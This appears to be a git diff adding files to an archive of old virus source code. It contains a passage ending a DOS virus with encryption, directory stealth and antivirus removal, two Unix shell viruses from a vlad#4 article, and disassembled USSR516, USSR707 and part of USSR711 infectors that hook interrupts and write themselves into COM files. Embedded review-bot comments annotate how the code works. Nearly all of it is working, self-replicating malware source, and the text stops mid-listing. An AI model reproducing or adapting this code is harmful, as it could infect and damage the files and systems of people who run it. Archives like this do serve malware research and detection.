+;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +xor word ptr [di],06acdh +not byte ptr [di] +add word ptr [di],04a83h +xor word ptr [di],0c3d7h +dec word ptr [di] +dec byte ptr [di] +not word ptr [di] +sub word ptr [di],0aa17h +xor word ptr [di],0e185h +add byte ptr [di],0b9h +xor byte ptr [di],061h +sub byte ptr [di],075h +xor byte ptr [di],030h +dec word ptr [di] +xor byte ptr [di],022h +dec word ptr [di] +add byte ptr [di],087h +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov cx,50 ;50 beep's! +beep: ;beep label! +mov ax,0E07h ; +int 10h ;print beep char +loop beep ;go! +NO_DAY: ; +ret ; +;--------------------------------- + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... 
+ int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 01fH ;day for the action +action_mes Db 0cH ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.unix.txt b/MSDOS/Virus.MSDOS.Unknown.unix.txt new file mode 100644 index 00000000..7804fce7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.unix.txt 
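Review bot: The comments in this file mix Spanish, English and jokes (`le saco los atributos al file`, `fuck label!`) and the generator header gives no summary of what the code does, so an analyst has to reconstruct it instruction by instruction; a short English header describing the flow would be the most useful addition. I would summarise it as: a two-stage in-place decryptor, residency by shrinking the program's MCB and allocating a block whose owner byte is set to 8 (`mov byte ptr es:[1],8`), an INT 21h hook that acts on AH=4Bh and answers `AX=0CACAH` with `BH=0CAH` as the installed check, FCB directory stealth on AH=11h/12h that subtracts `OFFSET FIN - OFFSET START` from the reported size, and the time-stamp seconds field compared against `FECHA` as the infection marker. The `mov ah,51h ;Is this Undocmented? huh...` comment should also be replaced: AH=51h (get current PSP segment) appears in standard DOS references, with AH=62h as the documented equivalent from DOS 3 on.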
@@ -0,0 +1,63 @@ + + Lame Unix Viruses + +---------------+ + + Well, you might have read the title to this article and thought, well + if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can + be answered quite simply, we had one free space! :) It was a bit of + a dilemma to begin with, we had four articles and one space. The problem + was they were all kinda lame. So it was a lame pick of the month episode. + + Out of the four articles this was the leastest lamest. Well actually + I don't know about that, but anyway it was the most different one we + had sitting there. Just to prove the title, the author of these + masterpieces asked to remain anonymous to save his reputation. + + These "viruses" are the equivalent of a DOS batch file infector because + they are written in shell language. They function similarly to companion + infectors by renaming the original file and replacing it with themselves. + Disinfection is simple by 'mv'ing (moving) the original files back. + + Anyway, perhaps someone is interested so here they are. There isn't + much use for them except to annoy your friends when it messes up all + the files in their directory. + ++-----------------------------------+ +#!/bin/sh +# Dumb Unix Virus +# I dont wanna write anutha dumb unix virus qark, i wont +# Due to excess lameness, dont distribute +# +for files in * +do + if [ -x files ] + then + if [ ! -d files ] + then + mv files files.EVILVIRUS.HELPME + cp $0 files + chmod +x files + files.EVILVIRUS.HELPME + fi + fi + ++-----------------------------------+ + +cat << _EOF >unix.virus + + +#!/bin/csh +# Dumber Unix Virus +# by +# SumUtherGuy +foreach i (*) +mv $i bak.$i +cp $0 $i +i >> $i + +end +_EOF + ++-----------------------------------+ + + diff --git a/MSDOS/Virus.MSDOS.Unknown.ussr516.asm b/MSDOS/Virus.MSDOS.Unknown.ussr516.asm new file mode 100644 index 00000000..cb87089a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ussr516.asm 
@@ -0,0 +1,278 @@ +ussr516 segment byte public + assume cs:ussr516, ds:ussr516 + org 100h +; Disassembled by Dark Angel of PHALCON/SKISM +; for 40Hex Number 7 Volume 2 Issue 3 +stub: db 0e9h, 0, 0 + db 0e9h, 1, 0, 0 +; This is where the virus really begins +start: + push ax + call beginvir + +orig4 db 0cdh, 20h, 0, 0 +int30store db 0, 0, 0, 0 ; Actually it's int 21h + ; entry point +int21store db 0, 0, 0, 0 + +beginvir: pop bp ; BP -> orig4 + mov si,bp + mov di,103h + add di,[di-2] ; DI -> orig4 + movsw ; restore original + movsw ; 4 bytes of program + xor si,si + mov ds,si + les di,dword ptr ds:[21h*4] + mov [bp+8],di ; int21store + mov [bp+0Ah],es + lds di,dword ptr ds:[30h*4+1] ; Bug???? +findmarker: + inc di + cmp word ptr [di-2],0E18Ah ; Find marker bytes + jne findmarker ; to the entry point + mov [bp+4],di ; and move to + mov [bp+6],ds ; int30store + mov ax,5252h ; Get list of lists + int 21h ; and also ID check + + add bx,12h ; Already installed? + jz quitvir ; then exit + push bx + mov ah,30h ; Get DOS version + int 21h + + pop bx ; bx = 12, ptr to 1st + ; disk buffer + cmp al,3 + je handlebuffer ; if DOS 3 + ja handleDBHCH ; if > DOS 3 + inc bx ; DOS 2.X, offset is 13 +handlebuffer: + push ds + push bx + lds bx,dword ptr [bx] ; Get seg:off of buffer + inc si + pop di + pop es ; ES:DI->seg:off buff + mov ax,[bx] ; ptr to next buffer + cmp ax,0FFFFh ; least recently used? 
+ jne handlebuffer ; if not, go find it + cmp si,3 + jbe quitvir + stosw + stosw + jmp short movetobuffer +handleDBHCH: ; Disk Buffer Hash Chain Head array + lds si,dword ptr [bx] ; ptr to disk buffer + lodsw ; info + lodsw ; seg of disk buffer + ; hash chain head array + inc ax ; second entry + mov ds,ax + xor bx,bx + mov si,bx + lodsw ; EMS page, -1 if not + ; in EMS + xchg ax,di ; save in di + lodsw ; ptr to least recently + ; used buffer + mov [di+2],ax ; change disk buffer + ; backward offset to + ; least recently used + xchg ax,di ; restore EMS page + mov [di],ax ; set to least recently +movetobuffer: ; used + mov di,bx + push ds + pop es ; ES:DI -> disk buffer + push cs + pop ds + mov cx,108h + lea si,[bp-4] ; Copy from start + rep movsw + mov ds,cx ; DS -> interrupt table + mov word ptr ds:[4*21h],0BCh ; New interrupt handler + mov word ptr ds:[4*21h+2],es ; at int21 +quitvir: + push cs ; CS = DS = ES + pop es + push es + pop ds + pop ax + mov bx,ax + mov si, 100h ; set up stack for + push si ; the return to the + retn ; original program +int24: + mov al,3 ; Ignore all errors + iret +tickstore db 3 ; Why??? +buffer db 3, 0, 9, 0 + +int21: + pushf + cli ; CP/M style call entry + call dword ptr cs:[int30store-start] + retn ; point of int 21h + +int21DSDX: ; For int 21h calls + push ds ; with + lds dx,dword ptr [bp+2] ; DS:DX -> filename + call int21 + pop ds + retn + + cmp ax,4B00h ; Execute + je Execute + cmp ax,5252h ; ID check + je CheckID + cmp ah,30h ; DOS Version + je DosVersion +callorig21: ; Do other calls + jmp dword ptr cs:[int21store-start] +DosVersion: ; Why????? 
; DOS Version + dec byte ptr cs:[tickstore-start] + jnz callorig21 ; Continue if not 0 + push es + xor ax,ax + push ax + mov es,ax + mov al,es:[46Ch] ; 40h:6Ch = Timer ticks + ; since midnight + and al,7 ; MOD 15 + inc ax + inc ax + mov cs:[tickstore-start],al ; # 2-17 + pop ax + pop es + iret +CheckID: ; ID Check + mov bx,0FFEEh ; FFEEh = -12h + iret +Execute: ; Execute + push ax ; Save registers + push cx + push es + push bx + push ds ; DS:DX -> filename + push dx ; save it on stack + push bp + mov bp,sp ; Set up stack frame + sub sp,0Ah ; Temporary variables + ; [bp-A] = attributes + ; [bp-8] = int 24 off + ; [bp-6] = int 24 seg + ; [bp-4] = file time + ; [bp-2] = file date + sti + push cs + pop ds + mov ax,3301h ; Turn off ^C check + xor dl,dl ; (never turn it back + call int21 ; on. Bug???) + mov ax,3524h ; Get int 24h + call int21 ; (Critical error) + mov [bp-8],bx + mov [bp-6],es + mov dx,int24-start + mov ax,2524h ; Set to new one + call int21 + mov ax,4300h ; Get attributes + call int21DSDX + jnc continue +doneinfect: + mov ax,2524h ; Restore crit error + lds dx,dword ptr [bp-8] ; handler + call int21 + cli + mov sp,bp + pop bp + pop dx + pop ds + pop bx + pop es + pop cx + pop ax + jmp short callorig21 ; Call orig handler +continue: + mov [bp-0Ah],cx ; Save attributes + test cl,1 ; Check if r/o???? 
+ jz noclearattr + xor cx,cx + mov ax,4301h ; Clear attributes + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Quit on error +noclearattr: + mov ax,3D02h ; Open read/write + call int21DSDX ; Filename in DS:DX + jc doneinfect ; Exit if error + mov bx,ax + mov ax,5700h ; Save time/date + call int21 + mov [bp-4],cx + mov [bp-2],dx + mov dx,buffer-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes to + call int21 ; buffer + jc quitinf + cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h + jne quitinf ; Otherwise, quit + mov dx,word ptr ds:[buffer+1-start]; dx = jmploc + dec dx + xor cx,cx + mov ax,4201h ; go there + call int21 + mov ds:[buffer-start],ax ; new location offset + mov dx,orig4-start + mov cx,4 + mov ah,3Fh ; Read 4 bytes there + call int21 + mov dx,ds:[orig4-start] + cmp dl,0E9h ; 0E9h means we might + jne infect ; already be there + mov ax,ds:[orig4+2-start] ; continue checking + add al,dh ; to see if we really + sub al,ah ; are there. + jz quitinf +infect: + xor cx,cx + mov dx,cx + mov ax,4202h ; Go to EOF + call int21 + mov ds:[buffer+2-start],ax ; save filesize + mov cx,204h + mov ah,40h ; Write virus + call int21 + jc quitinf ; Exit if error + sub cx,ax + jnz quitinf + mov dx,ds:[buffer-start] + mov ax,ds:[buffer+2-start] + sub ax,dx + sub ax,3 ; AX->jmp offset + mov word ptr ds:[buffer+1-start],ax; Set up buffer + mov byte ptr ds:[buffer-start],0E9h; code the jmp + add al,ah + mov byte ptr ds:[buffer+3-start],al + mov ax,4200h ; Rewind to jmploc + call int21 + mov dx, buffer-start + mov cx,4 ; Write in the jmp + mov ah,40h + call int21 +quitinf: + mov cx,[bp-4] + mov dx,[bp-2] + mov ax,5701h ; Restore date/time + call int21 + mov ah,3Eh ; Close file + call int21 + mov cx,[bp-0Ah] ; Restore attributes + mov ax,4301h + call int21DSDX + jmp doneinfect ; Return +ussr516 ends + end stub + diff --git a/MSDOS/Virus.MSDOS.Unknown.ussr707.asm b/MSDOS/Virus.MSDOS.Unknown.ussr707.asm new file mode 100644 index 00000000..3930628a --- /dev/null 
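Review bot: The critical-error handler's comment `int24: mov al,3 ; Ignore all errors` misstates the return code: for INT 24h, AL=0 is ignore, 1 retry, 2 abort and 3 fail, so this handler fails the request and the DOS call in `Execute` returns with carry set (which is what the `jc doneinfect` / `jc quitinf` checks consume); `; AL=3: fail the call, suppresses the Abort/Retry/Fail prompt` is the accurate comment. In `DosVersion`, `and al,7 ; MOD 15` and `mov cs:[tickstore-start],al ; # 2-17` disagree with the instruction as shown: masking with 7 leaves 0–7 and the two `inc ax` make it 2–9, so the comments should read `; MOD 8` and `; 2-9`. The `; Why???` on `tickstore` and `; Bug????` on `lds di,dword ptr ds:[30h*4+1]` are fine as open questions, but each should record what was observed next to the question mark.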
+++ b/MSDOS/Virus.MSDOS.Unknown.ussr707.asm 
@@ -0,0 +1,408 @@ + +PAGE 59,132 + +; +; +; USSR707 +; +; Created: 9-Feb-92 +; Passes: 5 Analysis Options on: AW +; +; + +data_1e equ 20h +data_2e equ 22h +data_3e equ 4Ch +data_4e equ 4Eh +data_5e equ 84h +data_6e equ 86h +data_7e equ 413h +data_8e equ 1460h +data_9e equ 3 +data_10e equ 2 + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ussr707 proc far + +start: + mov ax,offset loc_2 + push ax + retn +loc_2: + jmp short loc_3 + nop + +ussr707 endp + +; +; SUBROUTINE +; + +sub_2 proc near + call sub_3 + +; External Entry into Subroutine + +sub_3: + pop di + sub di,6 + retn +sub_2 endp + + db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah + db 26h,0FFh, 0Dh, 00h,0A0h, 00h + db 50h,0C3h, 01h, 2Eh,0A3h,0C0h + db 00h, 9Ch, 00h, 00h, 90h, 90h + db 90h,0CDh + db 20h +loc_3: + call sub_2 + mov ah,[di+21h] + mov byte ptr ds:[100h],ah + mov ax,[di+22h] + mov word ptr ds:[101h],ax + mov ax,[di+24h] + mov word ptr ds:[103h],ax + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + cmp ax,1E03h + je loc_4 ; Jump if equal + jmp loc_9 +loc_4: + mov bl,0 + mov ax,4BFFh + int 21h ; ??INT Non-standard interrupt + cmp bl,0FFh + jne loc_5 ; Jump if not equal + jmp loc_9 +loc_5: + mov ax,ds:data_10e + mov [di+14h],ax + mov bx,di + add bx,0Fh + xor ax,ax ; Zero register + mov es,ax +loc_6: + xor si,si ; Zero register + mov ax,es + inc ax + cmp ax,0FFFh + jbe loc_7 ; Jump if below or = + jmp short loc_9 + nop +loc_7: + mov es,ax +loc_8: + mov ah,es:data_8e[si] + cmp ah,[bx+si] + jne loc_6 ; Jump if not equal + inc si + cmp si,5 + jne loc_8 ; Jump if not equal + mov [di+0Dh],es + mov word ptr [di+1Fh],0 + mov ax,cs + dec ax + mov es,ax + call sub_7 + sub si,di + mov ax,si + mov cl,4 + shr ax,cl ; Shift w/zeros fill + inc ax + sub es:data_9e,ax + sub ds:data_10e,ax + mov bx,[di+14h] + sub bx,ax + mov es,bx + push di + call sub_4 + xor cx,cx ; Zero register + mov ds,cx + mov cl,6 + shr ax,cl ; Shift w/zeros fill + inc ax + sub ds:data_7e,ax + 
mov ax,ds:data_5e + mov cs:[bx+0Bh],ax + mov ax,ds:data_6e + mov cs:[bx+0Dh],ax + push cs + pop ds + mov cx,si + mov si,di + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop di + sub bx,di + add bx,2 + xor ax,ax ; Zero register + mov ds,ax + cli ; Disable interrupts + mov ds:data_5e,bx + mov ds:data_6e,es + sti ; Enable interrupts +loc_9: + push cs + pop ds + push cs + pop es + mov ax,offset start + push ax + retn + +; +; SUBROUTINE +; + +sub_4 proc near + call sub_5 + +; External Entry into Subroutine + +sub_5: + pop bx + retn +sub_4 endp + + push bx + mov bh,4Bh ; 'K' + cmp bh,ah + je loc_11 ; Jump if equal + pop bx +loc_10: +;* jmp far ptr loc_1 + db 0EAh, 93h, 17h, 26h, 0Dh +loc_11: + cmp al,0FFh + jne loc_12 ; Jump if not equal + pop bx + mov bl,0FFh + iret ; Interrupt return + pushf ; Push flags +;* call far ptr sub_1 + db 9Ah, 00h, 00h, 00h, 00h + push ax + in al,61h ; port 61h, 8255 port B, read + xor al,3 + out 61h,al ; port 61h, 8255 B - spkr, etc + mov al,0B6h + out 43h,al ; port 43h, 8253 wrt timr mode + mov ax,bx + out 42h,al ; port 42h, 8253 timer 2 spkr + mov al,ah + out 42h,al ; port 42h, 8253 timer 2 spkr + pop ax + iret ; Interrupt return +loc_12: + push ax + push cx + push dx + push di + push ds + push es + mov bx,dx + xor di,di ; Zero register +loc_13: + inc di + cmp byte ptr [bx+di],0 + jne loc_13 ; Jump if not equal + cmp word ptr [bx+di-2],4D4Fh + je loc_14 ; Jump if equal + jmp loc_26 +loc_14: + cmp byte ptr [bx+di-3],43h ; 'C' + je loc_15 ; Jump if equal + jmp loc_26 +loc_15: + call sub_2 + mov bx,di + add bx,1Ah + mov ax,70h + mov es,ax + xor di,di ; Zero register +loc_16: + inc di + cmp di,0FFFFh + jbe loc_17 ; Jump if below or = + jmp loc_26 +loc_17: + xor si,si ; Zero register +loc_18: + mov ah,es:[di] + cmp ah,cs:[bx+si] + jne loc_16 ; Jump if not equal + inc si + inc di + cmp si,5 + jne loc_18 ; Jump if not equal + sub di,5 + xor ax,ax ; Zero register + mov es,ax + push word ptr es:data_3e + push word 
ptr es:data_4e + cli ; Disable interrupts + mov es:data_3e,di + mov word ptr es:data_4e,70h + sti ; Enable interrupts + call sub_2 + mov bx,dx + xor cx,cx ; Zero register + mov ah,4Eh ; 'N' + call sub_6 + jnc loc_19 ; Jump if carry=0 + jmp loc_25 +loc_19: + mov ah,2Fh ; '/' + call sub_6 + mov ax,es:[bx+1Ah] + cmp ax,0F000h + jbe loc_20 ; Jump if below or = + jmp loc_25 +loc_20: + push ds + push dx + push word ptr es:[bx+15h] + push word ptr es:[bx+16h] + push word ptr es:[bx+18h] + add ax,100h + mov cs:[di+18h],ax + mov ax,4301h + mov cx,20h + call sub_6 + mov ax,3D02h + call sub_6 + jnc loc_21 ; Jump if carry=0 + jmp short loc_24 + nop +loc_21: + push cs + pop ds + mov bx,ax + mov ah,3Fh ; '?' + mov cx,5 + mov dx,di + add dx,21h + call sub_6 + mov ax,[di+18h] + sub ax,[di+22h] + cmp ax,2C3h + jne loc_23 ; Jump if not equal + cmp byte ptr [di+20h],1Eh + jae loc_22 ; Jump if above or = + inc byte ptr [di+20h] +loc_22: + jmp short loc_24 + nop +loc_23: + mov byte ptr [di+17h],0B8h + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_6 + mov ah,40h ; '@' + mov cx,3 + mov dx,di + add dx,17h + call sub_6 + mov ah,40h ; '@' + mov cx,2 + mov word ptr [di+17h],0C350h + call sub_6 + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_6 + mov ah,40h ; '@' + call sub_7 + mov cx,si + sub cx,di + mov dx,di + call sub_6 +loc_24: + mov ax,5701h + pop dx + pop cx + call sub_6 + mov ax,4301h + pop cx + mov ch,0 + pop dx + pop ds + call sub_6 + mov ah,3Eh ; '>' + call sub_6 +loc_25: + xor ax,ax ; Zero register + mov es,ax + cli ; Disable interrupts + pop word ptr es:data_4e + pop word ptr es:data_3e + sti ; Enable interrupts +loc_26: + call sub_2 + cmp byte ptr cs:[di+1Fh],0 + jne loc_27 ; Jump if not equal + cmp byte ptr cs:[di+20h],1Eh + jb loc_27 ; Jump if below + mov byte ptr cs:[di+1Fh],1 + xor ax,ax ; Zero register + mov es,ax + call sub_4 + add bx,17h + mov ax,es:data_1e + mov cx,es:data_2e + mov cs:[bx+2],ax + mov 
cs:[bx+4],cx + cli ; Disable interrupts + mov es:data_1e,bx + mov es:data_2e,cs + sti ; Enable interrupts +loc_27: + pop es + pop ds + pop di + pop dx + pop cx + pop ax + pop bx + jmp loc_10 + +; +; SUBROUTINE +; + +sub_6 proc near + pushf ; Push flags + call dword ptr cs:[di+0Bh] + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + call sub_8 + +; External Entry into Subroutine + +sub_8: + pop si + add si,5 + retn +sub_7 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ussr711.asm b/MSDOS/Virus.MSDOS.Unknown.ussr711.asm new file mode 100644 index 00000000..979031ad --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ussr711.asm 
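Review bot: The Sourcer-style `data_Ne equ` constants are used as raw interrupt-vector and BIOS-data offsets without saying so, which hides the file's most detection-relevant behaviour: `data_5e`/`data_6e` (84h/86h) are the INT 21h vector saved into `cs:[bx+0Bh]` and called through `sub_6`, `data_3e`/`data_4e` (4Ch/4Eh) the INT 13h vector that is temporarily pointed into segment 70h around the file write and restored at `loc_25`, `data_1e`/`data_2e` (20h/22h) the INT 08h timer vector hooked at `loc_26`, `data_7e` (413h) the BIOS base-memory-size word that `sub ds:data_7e,ax` decrements, and `data_9e`/`data_10e` appear to be the MCB size field and the PSP top-of-memory word that the residency path shrinks. Give each `equ` a trailing comment naming the slot (e.g. `data_5e equ 84h ; 0000:0084h = INT 21h vector offset`) so the stores under `cli` read as hooks rather than anonymous writes. The `; ??INT Non-standard interrupt` comment on `mov ax,4BFFh / int 21h` should also say it is the resident-copy check that `loc_11` answers with `mov bl,0FFh`, which is visible in the handler below.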
@@ -0,0 +1,384 @@
+
+PAGE 59,132
+
+;
+;
+; USSR711
+;
+; Created: 9-Feb-92
+; Passes: 5 Analysis Options on: AW
+;
+;
+
+data_1e equ 20h
+data_2e equ 22h
+data_3e equ 4Ch
+data_4e equ 4Eh
+data_5e equ 84h
+data_6e equ 86h
+data_7e equ 0D9h
+data_8e equ 0DBh
+data_9e equ 122h
+data_10e equ 124h
+data_11e equ 13Ah
+data_12e equ 13Ch
+data_13e equ 441h
+data_14e equ 3
+data_15e equ 12h
+data_16e equ 0
+data_17e equ 0B0h
+data_18e equ 0B2h
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+ussr711 proc far
+
+start:
+ jmp loc_1
+ int 21h ; DOS Services ah=function 00h
+ ; terminate, cs=progm seg prefx
+ call sub_1
+
+ussr711 endp
+
+;
+; SUBROUTINE
+;
+
+sub_1 proc near
+ pop bx
+ xor di,di ; Zero register
+ mov si,bx
+ sub si,3
+ mov ax,4B04h
+ int 21h ; ??INT Non-standard interrupt
+ cmp ax,44Bh
+loc_1:
+ call sub_2
+
+; External Entry into Subroutine
+
+sub_2:
+ pop bx
+ xor di,di ; Zero register
+ mov si,bx
+ sub si,3
+ mov ax,4B04h
+ int 21h ; ??INT Non-standard interrupt
+ cmp ax,44Bh
+ je $+7Dh ; Jump if equal
+ mov ax,es
+ dec ax
+ mov es,ax
+ mov ax,es:data_14e
+ sub ax,2Ch
+ mov es:data_14e,ax
+ sub word ptr es:data_15e,2Ch
+ nop
+ mov es,es:data_15e
+ mov cx,2BBh
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ cli ; Disable interrupts
+ xor ax,ax ; Zero register
+ mov ds,ax
+ mov cx,ds:data_5e
+ mov es:data_11e,cx
+ mov cx,ds:data_6e
+ mov es:data_12e,cx
+ mov word ptr ds:data_5e,126h
+ mov ds:data_6e,es
+ mov cx,ds:data_1e
+ mov es:data_7e,cx
+ mov cx,ds:data_2e
+ mov es:data_8e,cx
+ mov word ptr ds:data_1e,0B4h
+ mov ds:data_2e,es
+ mov cx,ds:data_3e
+ mov es:data_9e,cx
+ mov cx,ds:data_4e
+ mov es:data_10e,cx
+ mov word ptr ds:data_3e,0DDh
+ mov ds:data_4e,es
+ sti ; Enable interrupts
+ mov di,100h
+ mov si,bx
+ add si,2B3h
+ mov cx,3
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ mov ax,cs
+ mov es,ax
+ mov ds,ax
+ xor ax,ax ; Zero register
+ mov si,ax
+ mov di,0
+ mov bx,offset start
+ jmp bx ; Register jump
+ add bl,[si]
+ db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h + db 00h, 40h, 2Eh,0A3h,0B2h, 00h + db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h + db 00h, 75h, 10h, 2Eh, 81h, 3Eh + db 0B2h, 00h, 74h, 37h, 75h, 07h + db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h + db 00h + db 58h,0EAh, 0Ah, 01h, 49h,0D7h + db 2Eh, 83h, 3Eh,0B0h, 00h, 00h + db 74h, 3Ch, 80h,0FCh, 03h, 74h + db 05h, 80h,0FCh, 0Bh + db 75h, 32h +loc_3: + test dl,80h + js loc_4 ; Jump if sign=1 + push ax + mov ax,cs:data_18e + and ax,3 + pop ax + jnz loc_4 ; Jump if not zero + push bp + add [bp+si+7Dh],dh + push ax + mov ax,cs + mov ds,ax + mov ax,[bp+6] + push ax + popf ; Pop flags + stc ; Set carry flag + pushf ; Push flags + pop ax + mov [bp+6],ax + xor ax,ax ; Zero register + mov ds,ax + pop ax + mov ah,80h + mov ds:data_13e,ah + pop ds + pop bp + iret ; Interrupt return +loc_4: +;* jmp far ptr loc_20 +sub_1 endp + + db 0EAh, 49h, 01h, 08h,0D7h + cmp ax,4B04h + jne loc_5 ; Jump if not equal + mov ax,44Bh + iret ; Interrupt return +loc_5: + cmp ax,4B00h + je loc_7 ; Jump if equal + cmp ax,4B03h + je loc_7 ; Jump if equal +loc_6: +;* jmp far ptr loc_19 + db 0EAh,0B5h, 02h, 46h,0D5h +loc_7: + push ax + push bx + push cx + push dx + push ds + push es + push si + push di + mov ax,ds + mov es,ax + cld ; Clear direction + mov al,0 + mov di,dx + mov cx,0C8h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + jnz loc_8 ; Jump if not zero + std ; Set direction flag + mov al,2Eh ; '.' 
+ mov cx,0Ah + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al +loc_8: + jnz loc_11 ; Jump if not zero + inc di + inc di + mov al,[di] + and al,0DFh + cmp al,43h ; 'C' + jne loc_11 ; Jump if not equal + mov al,[di+1] + and al,0DFh + cmp al,4Fh ; 'O' + jne loc_11 ; Jump if not equal + mov al,[di+2] + and al,0DFh + cmp al,4Dh ; 'M' + jne loc_11 ; Jump if not equal + mov al,[di-2] + and al,0DFh + cmp al,44h ; 'D' + jne loc_9 ; Jump if not equal + mov al,[di-8] + and al,0DFh + cmp al,43h ; 'C' + je loc_11 ; Jump if equal +loc_9: + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + mov word ptr cs:[2B4h],cx + mov cx,20h + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_11 ; Jump if carry Set + mov word ptr cs:[2B0h],ds + mov word ptr cs:[2B2h],dx + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_11 ; Jump if carry Set + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + mov word ptr cs:[2ACh],cx + mov word ptr cs:[2AEh],dx + jmp short loc_12 + nop +loc_10: + jmp loc_6 +loc_11: + jmp loc_16 +loc_12: + mov cx,3 + mov ax,cs + mov ds,ax + mov es,ax + mov dx,2B6h + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov cx,0 + mov dx,word ptr cs:[2B7h] + add dx,3 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,0Ah + mov dx,29Bh + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cld ; Clear direction + mov cx,0Ah + mov si,29Bh + mov di,data_16e + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_15 ; Jump if zero + mov ax,4202h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; 
